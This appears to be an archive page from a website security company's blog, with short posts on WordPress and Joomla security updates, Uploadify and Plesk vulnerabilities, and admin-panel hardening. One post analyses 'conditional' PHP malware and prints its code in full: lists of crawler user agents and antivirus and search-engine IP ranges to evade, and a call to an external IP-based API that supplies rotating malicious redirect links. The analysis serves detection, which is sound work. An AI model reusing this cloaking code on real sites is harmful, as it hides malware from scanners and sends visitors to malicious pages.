Protect Your Interwebs!
On June 12th we reported the release of a new Microsoft Security Advisory. It was of specific interest to us as it was exploitable via web-based malware and being classified as a Zero Day vulnerability.
To that point, today, NakedSecurity reported that the Blackhole Exploit Kit has been updated with a module designed to exploit that vulnerability.
Well it was only a few weeks ago, but today, two new patches were released: 3.3.3 and 3.4.1.
The good news is, as they are patches, the updates should be fairly straight forward and should not cause much, if any, issues. It is important to note though that this is a Maintenance and Security release. On their official post they highlight the following items:
- Fixes an issue where a theme’s page templates were sometimes not detected.
- Addresses problems with some category permalink structures.
- Better handling for plugins or themes loading JavaScript incorrectly.
- Adds early support for uploading images on iOS 6 devices.
- Allows for a technique commonly used by plugins to detect a network-wide activation.
- Better compatibility with servers running certain versions of PHP (5.2.4, 5.4) or with uncommon setups (safe mode, open_basedir), which had caused warnings or in some cases prevented emails from being sent.
We are seeing a lot of noise again regarding the Uploadify script vulnerabilities affecting some WordPress themes/plugins. If you are not familiar, Uploadify allows anyone to upload anything they want to your site without any authentication.
Very very useful, no? Maybe, but at what cost? If a bad guy/gal knows that you have the Uploadify script, they can upload anything they want too (backdoors) and hack your site.
First, Uploadify is nothing new. When we were reporting on the TimThumb vulnerabilities, we were also notifying everyone about the issues with uploadify.
Our friends over at Unmask Parasites posted two very good reports about a mix of Plesk vulnerabilities being used to mass-compromise websites, and redirecting them to the Blackhole Exploit Kit.
The first issue is that old versions of Plesk store passwords in clear text (yes, clear text in 2012). The second is a remote SQL vulnerability that has been found in old versions of Plesk allowing attackers to exploit those passwords.
clear text password + database dump = Mass password leaks
This has possibly allowed attackers to gain access to a large number of passwords and hosts/sites. We recommend reading those two posts to understand the issue:
Read More
I put together a post this weekend about my personal experience installing a WordPress site on a clean Server. In the process of hardening the administration panel I found myself doing something that I don’t see discussed much – enabling Basic Access Authentication.
That got me thinking about a putting together this post which will help educate our readers on a quick and easy method that can help add a second layer of authentication to their own administrative panels. What’s great about this is it can be applied to any web application that is running on an Apache HTTP Server, those platforms include:
Have you checked out Sucuri Labs? We have been adding a daily feed of the top web-based malware
samples that we find every day, and the number of compromised sites as well.
We separate the data into three main categories:
This helps us understand how sites are getting compromised and how it is being executed in the browser.
Read More
In today’s web malware landscape you can’t help but take a minute to familiarize yourself with a concept known as conditional malware.
As implied in the name, it’s malware that only works when specific rules are met. Those rules can range from specific IP ranges to time of day. They are very tricky and as you would expect, evolve every day. Often when someone calls or sends us an email asking why we’re not picking something up on our free scanner, SiteCheck, that’s usually the case. As of late, the PHARMA hack is being notorious for the use of conditional type infections making it exceptionally difficult to detect via HTTP.
In this post we’ll take a look at a specific type of conditional malware that is applying specific rules around which IP’s it will not display to. It’s the same string that we wrote about earlier causing us to flag Google.com as malware.. oops..:)
My goal is to keep it high level, not going to get crazy with the code, but I do want to take some time to walk through it so that you can learn to detect similar infections in your environment.
The first thing you notice when you see the infection is the use of $user_agent_to_filter. This is telling the code to dispaly if it comes from any one of those user agents:
$user_agent_to_filter = array( ‘#Ask\s*Jeeves#i’, ‘#HP\s*Web\s*PrintSmart#i’, ‘#Safari#i’, ‘#HTTrack#i’, ‘#Chrome#i’, ‘#Mac#i’, ‘#IDBot#i’, ‘#Indy\s*Library#’, ‘#ListChecker#i’, ‘#MSIECrawler#i’, ‘#NetCache#i’, ‘#Nutch#i’, ‘#RPT-HTTPClient#i’, ‘#rulinki\.ru#i’, ‘#Twiceler#i’, ‘#WebAlta#i’, ‘#Webster\s*Pro#i’,'#www\.cys\.ru#i’, ‘#Wysigot#i’, ‘#Yahoo!\s*Slurp#i’, ‘#Yeti#i’, ‘#Accoona#i’, ‘#CazoodleBot#i’, ‘#CFNetwork#i’, ‘#ConveraCrawler#i’,'#DISCo#i’, ‘#Download\s*Master#i’, ‘#FAST\s*MetaWeb\s*Crawler#i’, ‘#Flexum\s*spider#i’, ‘#Gigabot#i’, ‘#HTMLParser#i’, ‘#ia_archiver#i’, ‘#ichiro#i’, ‘#IRLbot#i’, ‘#km\.ru\s*bot#i’, ‘#kmSearchBot#i’, ‘#libwww-perl#i’, ‘#Lupa\.ru#i’, ‘#LWP::Simple#i’, ‘#lwp-trivial#i’, ‘#Missigua#i’, ‘#MJ12bot#i’,
‘#msnbot#i’, ‘#msnbot-media#i’, ‘#Offline\s*Explorer#i’, ‘#OmniExplorer_Bot#i’,
‘#PEAR#i’, ‘#psbot#i’, ‘#Python#i’, ‘#rulinki\.ru#i’, ‘#SMILE#i’,
‘#Speedy#i’, ‘#Teleport\s*Pro#i’, ‘#TurtleScanner#i’, ‘#User-Agent#i’, ‘#voyager#i’,
‘#Webalta#i’, ‘#WebCopier#i’, ‘#WebData#i’, ‘#WebZIP#i’, ‘#Wget#i’,
‘#Yandex#i’, ‘#Yanga#i’, ‘#Yeti#i’, ‘#msnbot#i’, ‘#spider#i’, ‘#yahoo#i’, ‘#jeeves#i’ ,’#google#i’ ,’#altavista#i’,
‘#scooter#i’ ,’#av\s*fetch#i’ ) ;
The next you notice is there long array of IP’s. In essence, if you contain an IP that equals their value or even fits within the range a different action will occur. How nice of them to actually comment on those ranges that belong to search engines and AntiVirus providers.
$stop_ips_masks = array(
“66\.249\.[6-9][0-9]\.[0-9]+”, // Google NetRange: 66.249.64.0 – 66.249.95.255
“74\.125\.[0-9]+\.[0-9]+”, // Google NetRange: 74.125.0.0 – 74.125.255.255
“65\.5[2-5]\.[0-9]+\.[0-9]+”, // MSN NetRange: 65.52.0.0 – 65.55.255.255,
“74\.6\.[0-9]+\.[0-9]+”, // Yahoo NetRange: 74.6.0.0 – 74.6.255.255
“67\.195\.[0-9]+\.[0-9]+”, // Yahoo#2 NetRange: 67.195.0.0 – 67.195.255.255
“72\.30\.[0-9]+\.[0-9]+”, // Yahoo#3 NetRange: 72.30.0.0 – 72.30.255.255
“38\.[0-9]+\.[0-9]+\.[0-9]+”, // Cuill: NetRange: 38.0.0.0 – 38.255.255.255
“93\.172\.94\.227″, // MacFinder
“212\.100\.250\.218″, // Wells Search II
“128\.103\.64\.[0-9]+”, // StopBadWare
“150\.70\.[0-9]+\.[0-9]+”, // TrendMicro
“216\.104\.[0-9]+\.[0-9]+”, // TrendMicro
“207\.46\.[0-9]+\.[0-9]+”, // Microsoft
“157\.55\.[0-9]+\.[0-9]+”, // Microsoft
“213\.180\.[0-9]+\.[0-9]+”, // Yandex
“217\.23\.[0-9]+\.[0-9]+”, // Kaspersky
“91\.103\.64\.[0-9]+”, // Kaspersky
“215\.5\.80\.[0-9]+”, // Kaspersky
“195\.168\.53\.[0-9]+”, // NOD32
“220\.255\.1\.[0-9]+”, // domain-tool.com
“69\.28\.58\.[0-9]+”, // Symantec
“66\.147\.244\.[0-9]+”, // freepcsecurity.co.uk
“128\.111\.48\.[0-9]+”, // wepawet.cs.ucsb.edu
“209\.9\.239\.[0-9]+”, // jsunpack.jeek.org
“62\.67\.194\.[0-9]+”, // support.clean-mx.de
“195\.214\.79\.[0-9]+”, // support.clean-mx.de
“97\.74\.141\.[0-9]+”, // malwareurl.com
“213\.171\.194\.[0-9]+”, // spamhaus
“139\.146\.167\.[0-9]+”, // malwaredomains
“88\.160\.229\.[0-9]+”, // malwaredomains
“69\.162\.79\.[0-9]+”, // malwarebytes
“66\.40\.145\.[0-9]+”, // bitdefender
“66\.223\.50\.[0-9]+”, // bitdefender
“204\.14\.90\.[0-9]+”, // spywarewarrior.com
“92\.123\.155\.[0-9]+”, // Sophos
“213\.31\.172\.[0-9]+”, // Sophos
“143\.215\.130\.[0-9]+”, // Malwaredomainlist
“150\.70\.172\.[0-9]+”, // TrendNet
“64\.88\.164\.[0-9]+”, // AVG
“102\.157\.192\.[0-9]+”, // ZeusTracker
“109\.65\.41\.[0-9]+”, // ZeusTracker
“110\.77\.248\.[0-9]+”, // Virustotal
“59\.6\.145\.[0-9]+”, // Virustotal
“67\.124\.37\.[0-9]+”, // Virustotal
Then once the user agents have been defined and the “bad” IP’s flagged, you then have the condition. In this instance what it is saying is if any of the IP’s fall within those identified above redirect them to http://www.google.com. How annoying is that!!!!
foreach ( $stop_ips_masks as $k=>$v )
{
if ( preg_match( ‘#^’.$v.’$#’, $_SERVER['REMOTE_ADDR']) )
$is_bot = TRUE ;
}
if ( $is_bot || !( FALSE === strpos( preg_replace( $user_agent_to_filter, ‘-NO-WAY-’, $_SERVER['HTTP_USER_AGENT'] ), ‘-NO-WAY-’ ) ) )
{header(“Location: http://www.google.com/”);
die();
Now that we know what it does if the condition is met, let’s look at what it does if the condition is not met.
set_time_limit(30);
$cache = dirname(__FILE__) . ‘/link.cache’;
$link = @file_get_contents($cache);
if (strlen($link) < 20 || (time()-@filemtime($cache)) > 60)
{
$link = @file_get_contents(‘http://88.198.28.38/api.php?action=link&aid=658&fid=3714&hash=beca79b043b1b5e25d514191ce8a691c291b8626′);if (strlen($link) > 20)
{
$fp = @fopen ($cache, ‘w’);
@fputs($fp, $link);
@fclose($fp);
}
}header (‘Location: ‘ . $link);
exit;
As you can see, if the condition is not met then the incoming request continues down the the yellow brick road and finds at a new domain courtesy of this:
@file_get_contents(‘http://88.198.28.38/api.php?action=link&aid=658&fid=3714&hash=beca79b043b1b5e25d514191ce8a691c291b8626′);
That little API defines which URL to share with the request. It actually rotates the domains so if you hit it multiple time you’re not likely to get the same one.
This specific instance only talks to one type, there are varying permutations of this floating the interwebs. If you’re a client, we highly recommend enabling the server-side scanner as it’s not restricted to the limitations found with HTTP crawlers.
A couple of tale tell signs that something is wrong is if you start getting comments like this:
Keep an eye out for questions or comments that resemble any of those points, if you hear them you now know that you’re likely dealing with some type of conditional malware.
Today Google released a nice post: Safe Browsing – Protecting Web Users for 5 Years and Counting. In it they provide a good summary of what they have been up to the past 5 years with their Safe Browsing program.
Here are some interesting data points:
Every day we service 100′s of clients and the question is always asked:
How do you stop these hackers!!!”
Unfortunately, it’s perhaps the hardest to explain and understand for most. That being said, this post will be one of a series that talks to what end-users can do to help reduce their threat landscape.
This post will augment our previous post, Ask Sucuri: “How to Stop The Hacker and ensure Your Site Is Locked!!”, but hopefully provide you more tangible take-away’s. It will also leverage guidance recently shared at a conference for WordPress enthusiats – WordCamp Orange County 2012.
Give a man a fish and you feed him for a day. Teach a man to fish and you feed him a lifetime. – Chinese proverb
Joomla 2.5.5 was just released today, with a few bugs fixed and 2 important security updates for a privilege escalation and an information disclosure issue:
High severity security issue, that allows unprivileged users to get admin access to a site running Joomla.
This is a low severity security issue that leaks internal information about the database, internal paths and PHP info.
More information about this release here: Joomla 2.5.5 released
Remember, the leading cause for web site compromises is outdated software! So as a web site owner, you have to do your part to minimize risk and keep your site (and your users) safe. Update now!
Sitecheck was also updated to alert users not running version 2.5.5 on their Joomla sites.
Receive new posts in your inbox.
Copyright © 2013 Sucuri Inc. · Terms of Service · Privacy Policy
Sucuri® is a registered trademark of Sucuri Inc. in the United States and/or other countries.
Comments